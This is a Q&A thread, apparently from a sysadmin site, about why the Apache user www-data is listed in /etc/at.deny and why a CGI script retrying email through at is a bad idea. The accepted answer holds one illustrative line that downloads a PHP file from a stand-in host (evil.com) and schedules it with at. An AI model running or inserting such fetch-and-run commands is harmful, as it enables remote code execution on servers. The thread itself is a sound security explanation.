# Why is `www-data` (Ubuntu / Apache user) listed in the `/etc/at.deny` file?

Tags: apache-2.2, security, permissions, at

I have a cgi script that is resending an email on a failed attempt 5-10 minutes after a user accesses a page.  My thought was to do this using the `at` command from a python call (`os.system("at now + 5 minutes <<< ' python resend.py data'")`).  Testing revealed:

```
$ sudo su www-data
$ at now
You do not have permission to use at.
$
```

What sort of grief am I exposing myself to if I remove user 'www-data' from the `/etc/at.deny` file?

Comment: What sort of reason do you have for ***wanting*** the `www-data` user to be able to submit `at` jobs? -- "resending an email" is not something one would normally do with `at`...

Comment: @voretaq7 The bigger question really is 'How can I retry sending an email from cgi script?'  At present, a CGI script sends an email, on occasion that fails and we have traverse the logs to look for failures.  Submitting an `at` job on email failure would lessen our burden.

Comment: That's not the CGI script's job -- You submit the email to your local MTA (which should really never fail. If it is fix *that* problem). If you're trying to deal with all the possible ways SMTP email can go wrong via your web application, ***don't***. Email isn't reliable message delivery, and you shouldn't try to hack it into being reliable. You're just going to go down the rabbit hole of nasty hacks and multi-layer special cases if you try.

Comment: @voretaq7 Good advice.  But I'm new to python and didn't see a simple MTA interface.  I'll look further.

Comment: http://docs.python.org/2/library/email-examples.html http://docs.python.org/2/library/smtplib.html http://stackoverflow.com/questions/73781/sending-mail-via-sendmail-from-python

Answer (score 0, accepted):

by making that proposed change, you are allowing the user apache runs as to execute jobs in the future, at a later time.... i dunno this is possible, but if you where able to subvert a webserver to execute serverside something like

> exec("cd /tmp && wget http://evil.com/evil.php && at laterdate /tmp/evil.php")

this would exec that downloaded php script, at a later time.

its basically one time cron, and to be honest, i usually disable it, in favor of jenkins.

Comment: It is a one time `cron`.  But I don't understand "i usually disable it, in favor of jenkins".  What do you disable, and what is jenkins?

Comment: @jamie, jenkins is the continuous integration solution to all the worlds problems

Comment: But if the attacker would be able to get as far as to execute this I would say he could do the same amount of evil without using the `at` command...?! The only difference is that he can delay the evil.... it's evil regardless...